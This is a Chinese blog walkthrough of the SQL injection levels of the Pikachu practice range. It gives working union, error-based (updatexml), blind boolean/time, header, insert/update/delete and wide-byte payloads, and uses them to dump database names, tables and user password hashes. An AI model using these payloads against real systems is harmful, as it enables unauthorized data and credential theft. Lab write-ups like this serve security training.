SQL注入-Pikachu靶场通关

已于 2023-08-21 15:10:44 修改
阅读量1.7k 收藏 22
点赞数 2
分类专栏: pikachu靶场练习 文章标签: 网络安全 web安全 数据库
于 2023-08-21 15:09:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rumil/article/details/132408447
版权

SQL注入-Pikachu靶场通关

目录

概述

	在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。
	SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
	在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞:
		1.对传进SQL语句里面的变量进行过滤,不允许危险字符传入;
		2.使用参数化(Parameterized Query 或 Parameterized Statement);
		3.还有就是,目前有很多ORM框架会自动使用参数化解决注入问题,但其也提供了"拼接"的方式,所以使用时需要慎重!

数字型注入(post)

点击下拉框进行查询

image-20230820223216584

bp抓包获取信息

此题为post请求,说明请求内容在请求体当中

image-20230820223353554

发给重发器进行测试

payload:
id=1 and 1=1# 回显正常
id=1 and 1=2# 回显不正常
存在注入点

image-20230820223612771

回显不正常,说明带入数据库进行查询,执行了sql语句

image-20230820223657158

判断字段个数

payload:
id=1 order by 1# 回显正常
id=1 order by 2# 回显正常
id=1 order by 3# 回显不正常
说明有2列字段

image-20230820224102968

判断回显点

payload:
id=-1 union select 1,2#

image-20230820224349505

爆数据库

payload:
id=-1 union select user(),database()#
查询数据库的用户,当前数据库

version() 查看数据库版本
@@version_compile_os 查看操作系统

image-20230820224501592

爆数据表

payload:
id=-1 union select database(),table_name from information_schema.tables where table_schema=database()#

image-20230820224931127

爆字段

payload:
id=-1 union select database(),column_name from information_schema.columns where table_name='users'#

image-20230820225223189

爆数据信息

payload:
id=-1 union select database(),group_concat(username,"/",password) from users#

image-20230820234045949

看源码

成功获取用户名以及密码,MD5解密即可

image-20230820234136099

字符型注入(get)

在输入框内输入admin

image-20230821001107432

尝试注入:

admin后加单引号,出现报错

image-20230821001230992

payload:
?name=admin' and 1=1--+ 回显正常
?name=admin' and 1=2--+ 回显不正常
存在注入

image-20230821001359846

sql语句被执行,爆出username不存在,说明插入的语句被执行带到数据库当中去查询

image-20230821001604712

接下来的步骤判断字段的个数,看回显点,爆库,爆表,爆字段,都和以上的数字型注入一致,区别就是类型不同,本题为字符型,单引号闭合,其他注入语句和以上一致。

搜索型注入

在输入框当中,尝试输入数字1

image-20230821001846899

分析为,sql语句当中存在模糊查找,%字符,与一般的字符型注入和数字型注入不同的是,搜索型注入的sql语句往往形如:select xxx from xxx where xxx like ‘%abcd%’

本质上和字符型注入的方式基本一样但闭合的特殊符号换成了%

测试注入点:

payload:
?name=1%' and 1=1--+ 回显正常
?name=1%' and 1=2--+ 回显不正常
存在注入

image-20230821002256959

说明sql语句被带到数据库当中去查询,被执行,没有查到信息

image-20230821002232803

接下来的步骤判断字段的个数,看回显点,爆库,爆表,爆字段,都和以上的数字型注入一致(注入sql语句也大体一致),区别就是类型不同,本题为搜索型,%'闭合,其他注入语句和以上一致。

xx型注入

不同的闭合方式分别去测试,本题为')闭合

使用圆括号尝试构造闭合:

name=1 正常

name=1' 报错

name=1') 报错

name=1') --+ 正常

image-20230821003312448

接下来的步骤判断字段的个数,看回显点,爆库,爆表,爆字段,都和以上的数字型注入一致(注入sql语句也大体一致),区别就是类型不同,本题为其他类型的闭合方式,')闭合,其他注入语句和以上一致。

判断字段个数:

image-20230821003537892

其他的爆库,爆表,爆字段,获取信息等sql语句和以上基本一致(数字型注入)。

insert/update注入

注册用户:

首先点击注册账号

image-20230821122800676

注册时,抓包获取信息

使用bp抓包,获取数据包后,发送给重发器进行测试

image-20230821122903454

测试注入:

从username处开始尝试

payload:
username=xiaohong' or updatexml(1,concat(0x7e,database()),3) or '&password=xiaohong123456&sex=%E5%A5%B3&phonenum=123123&email=hebei&add=hebei&submit=submit

' or updatexml(1,concat(0x7e,database()),3) or '

image-20230821123310141

若查看其他数据库信息,替换database()即可

爆数据表:

payload:
' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),0x7e),1) and '
通过修改limit 0,1当中第一个数字的值,逐一查看即可
...

' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 3,1),0x7e),1) and '
当limit 3,1的时候,可查看到users这张表

image-20230821124824245

爆字段

payload:
' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e),1) and '
相同的道理,limit逐一去看列的信息
...

当limit 12,1的时候,发现username
' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 12,1),0x7e),1) and '

当limit 13,1的时候,发现password
' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 13,1),0x7e),1) and '

image-20230821125302124

image-20230821125327944

接下来就是获取username和password的信息

payload:
爆username的值:

' and updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1) and '

' and updatexml(1,concat(0x7e,(select username from users limit 1,1),0x7e),1) and '

' and updatexml(1,concat(0x7e,(select username from users limit 2,1),0x7e),1) and '
同样的道理还是limit去逐一查看切换第一个数字的值即可
limit 0,1 查出admin用户
limit 1,1 查出pikachu用户
limit 2,1 查出test用户

image-20230821125914478

payload:
爆password
与username对应
admin密码:
' and updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1) and '
pikachu密码:
' and updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1) and '
test密码:
' and updatexml(1,concat(0x7e,(select password from users limit 2,1),0x7e),1) and '

成功获取密码

admin密码:

image-20230821130606002

pikachu密码:

image-20230821130736004

test密码:

image-20230821130756095

如果想一次性爆出,可以使用group_concat
但是updatexml限制长度,可以使用substr来进行显示
数据库的substr函数用法:
1、substr(str,pos,len)从pos开始的位置,截取len个字符;
2、substr(str,pos) pos开始的位置,一直截取到最后。

payload:
'and updatexml(1,concat(0x7e,substr((select group_concat(username,'/',password) from pikachu.users),1,32),0x7e),1) and '

image-20230821132808132

当爆破完整的数据时,修改substr中第二个参数即可控制从何处进行显示,最后获得完整的数据。

爆出来的密码使用MD5进行解密即可。

更新用户信息:

在修改信息处,修改时进行抓包

image-20230821133616495

同理,使用bp抓包进行测试

测注入点,爆数据库
在add参数后面测试
payload:
' and updatexml(1,concat(0x7e,database()),3) and '#
其他参数位置都可以尝试

成功获取当前数据库
image-20230821133754231

其余的爆库爆表爆数据的操作和以上注册时注入的sql语句一致,大体一样。

delete注入

首先发表留言:

image-20230821134209255

删除留言时进行抓包

发给测试器进行测试

image-20230821134258904

测试注入点:

注意在bp当中,get请求当中去输入sql语句时,空格用+替代,否则会出现问题
payload:
+or+updatexml+(1,concat(0x7e,database()),0)--+

成功获取当前的数据库:

image-20230821135043594

其他的爆库爆表爆字段内容的sql语句以上注册时注入的一致。

http头部注入

该注入是对http包中的user-agent、x-forwarded-for或referer进行注入,当上述信息可被带入数据库进行处理时,可对其进行sql注入。

根据提示使用admin/123456进行登录

image-20230821135406179

登录后可查看到相关的信息ip,UA头信息等

开始尝试注入:

登录时使用bp抓包,发送给重发器进行测试

在cookie信息处存在注入,可进行注入:

payload:
' or updatexml(1,concat(0x7e,(select database()),0x7e),1) or '

成功回显

image-20230821140000025

在UA头部也可以注入,也可以成功回显

payload和以上一致

' or updatexml(1,concat(0x7e,(select database()),0x7e),1) or '

image-20230821140133874

发现通过报错注入,数据库名被回显,说明UA代理也是一个注入点。

后续注入的基本流程和方法如上述报错注入基本相同。使用cookie注入或UA注入都可以。

基于boolian的盲注

布尔判断指的是利用SQL语句逻辑与操作,判断and两边的条件是否成立,SQL语句带入输入库查询后判断返回内容(通常返回值仅有非空和空两种状态),类似布尔型的true和false的两种状态。

(因为比较麻烦所以一般手动注入不会考虑此方法,需要慢慢判断)

输入任何值都说username不存在,有注入点,但是不会回显数据,这里可以尝试布尔注入,由于无法回显数据,利用逻辑操与数据库版本第1位数字字符做判断;

image-20230821142233189

image-20230821141531428

payload:
1' and left(version(),1)=5 --+
1' and length(database())>8 --+
' and length(database())>1#
 and (select substr(database(),1,1))='p'#
 ...
 爆表长
 ' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=8#
 ....

之后可通过bp或者脚本进行测试注入

基于时间的盲注

首先拿到此,发现不论输入什么,都是这个效果,提示这一句话

image-20230821142816465

输入一句话进行延迟看是否有效果,有效果说明存在注入:

payload:
admin and sleep(5)# 没有延迟
admin' and sleep(5)# 存在延迟

image-20230821143433335

if和sleep结合使用
admin'+and+if(1>0,sleep(5),-1)# 存在延时
猜解:
admin' and if((substr(database(),1,1))='s',sleep(5),-1)# 不延迟
admin' and if((substr(database(),1,1))='p',sleep(5),-1)# 延迟

image-20230821143731524

时间盲注整体上基本就是在布尔盲注的基础上增加if判断,并且与sleep配合,布尔盲注是当对的时候,返回正确的值,错误的时候返回错误的值,而时间盲注,不管正确还是错误都不会返回值,需要靠延迟判断。

通过对数据库信息的各个位置的不断判断,字母,长度等来推测数据库的数据

wide byte注入(宽字节注入)

宽字节注入,大概意思就是有些过滤不严谨的地方后端编码可能使用UTF8编码\'进行了单引号转义,有时候我们使用GBK编码绕过后端反斜杠转义

测试宽字节注入,和联合注入是一样的只是在内容后面添加%df即可,通过在内容输入处输入内容,然后修改。比如获取显示位。

宽字节注入的原理是:
当转义使用的\为ASCII编码,而客户端传入的参数被当成GBK等宽字节编码,则可以通过在\之前插入一个十六进制字节(ASCII码要大于128,才到汉字的范围)来让mysql以为插入的字节和\是一个中文字符,从而吃掉\,摧毁转义。

当输入1的时候,查询效果:

image-20230821144235341

进行抓包,测试注入:

payload:
name=1%df' or 1=1# 回显正常
name=1%df' or 2=1# 回显不正常
存在注入

image-20230821144515396

说明带到数据库当中进行查询

image-20230821144531078

使用联合查询进行注入:

判断回显:

payload:
name=1%df' union select 1,2#

image-20230821144641550

其他获取数据库信息,爆库、爆表、爆字段等信息同字符型注入使用的联合查询注入方式一致。

rumilc
关注
  • 2
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
pikachu 靶场通关(全)
最新发布
m0_59598029的博客
04-10 863
发现同一个验证码我们重复使用了多次,返回的结果时用户名或密码错误,并没有提示验证码失效,也就是只要我们这个页面不刷新,就可以一直用这个验证码,那就跟第一关一样,直接ctrl+i拿去爆破,得到了跟上面一样的用户名跟密码。//union语句聚合两个查询的内容,由于页面只返回一行,所以在前面的输入一个不存在的id,我这里直接使-号,以返回我们输入的内容,这里页面上将1,2都返回了,得知两个字段都有回显,经过查找发现是在密码输入框的下方多一个隐藏的输入框,记录的是token的信息,那么直接拿去burp上开始爆破!
pikachu靶场通关
11-19
pikachu靶场通关
sql注入 pikachu post数字型注入
08-12
sql注入 pikachu post数字型注入
pikachu靶场SQL注入.docx
09-13
pikachu靶场SQL注入章节解题
Pikachu靶场sql注入通关
oiadkt的博客
03-07 4029
pickchusql注入通关
pikachu靶场通关指南
weixin_43110519的博客
10-06 2147
pikachu靶场记录
SQL注入-pikachu靶场
qq_43936524的博客
10-13 366
文章目录SQL注入概述SQL分类 SQL注入概述 SQL注入指的是通过将恶意SQL语句添加到应用的输入参数中,传递到后台被SQL服务器解析后执行的攻击。 SQL分类 数字型注入 输入查询id后抓包 改变参数1 = 1 or 1 字符型注入 ...
Pikachu靶场通关笔记--Sql Inject(SQL注入)
weixin_45908624的博客
12-09 2536
sql注入
PiKachu之Sql (SQL注入)通关 2022
av11566的博客
04-18 7683
遇到一个待测点: 1、判断是否有注入(判断是否未严格校验)-->第一要素 1)可控参数的改变能否影响页面显示结果。 2)输入的SQL语句是否能报错-能通过数据库的报错,看到数据库的一些语句痕迹(select username, password from user where id = 4 and 0#3)输入的SQL语句能否不报错-我们的语句能够成功闭合 2、什么类型的注入 3、语句是否能够被恶意修改--第二个要素 4、是否能够成功执行-->第三个要素 5、获取我们想要的数据。
WEB渗透学习-pikachu靶场练习
04-20
pikachu是一个开源靶场,适用于新手学习WEB安全时练习使用,内涵XSS漏洞、sql注入漏洞、SEC漏洞、文件上传(下载)漏洞、文件包含漏洞以及越权漏洞等
pikachu-master靶场
07-14
pikachu-master靶场
Pikachu安全靶场通关手册
09-29
Pikachu靶场通关手册,适用于网络安全初学人才,步骤详细。
pikachu靶场环境
02-12
pikachu靶场环境
pikachu靶场网盘下载
04-01
pikachu是一个漏洞练习平台。其中包含了常见的web安全漏洞,如果你是一个渗透测试学习者没有靶场练手,那么pikachu将是一个不错的选择。
SQL注入原理
weixin_50340347的博客
06-15 1225
SQL注入靶场平台使用的是sqli。它是一个针对SQL注入的专项联系平台。搭建和安装比较简单,可以自习查询相关教程。
Pikachu靶场 报错SQL注入实战测试
感谢关注
12-24 679
使用。
pikachu靶场SQL注入解题思路
weixin_44500257的博客
02-21 1463
第一关 数字型注入(POST) 操作界面如下图 使用burpsuit对流量进行抓包,把数据包发送到Repeater模块进行测试 发送正常流量,web界面正常响应情况如下图所示 首先我们要了解该关卡注意的考点①数据类型是数字型②提交方式是POST 注入点的判断有很多方式,核心的思想就是id=后面的参数能否带入数据库查询,如果参数是数据库查询语句能否执行payload语句。 判断第一步:id=1 后面加 ‘ “ ‘) “)来查询后台SQL查询语句id的闭合方式 ‘ 报错 “报错 ‘) 报错 “
sql注入-pikachu靶场
10-13
SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过构造恶意的SQL语句来获取或篡改数据库中的数据。在Pikachu靶场中,可以通过注入恶意的SQL语句来获取管理员账户的密码。具体步骤如下: 1. 在登录页面输入用户名和密码,点击登录按钮。 2. 在浏览器中按F12打开开发者工具,切换到Network选项卡。 3. 再次点击登录按钮,查看POST请求的数据包。 4. 将POST请求的数据包复制到Burp Suite等代理工具中。 5. 在代理工具中修改用户名为:admin'--,密码随意填写。 6. 发送修改后的数据包,即可成功登录管理员账户。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值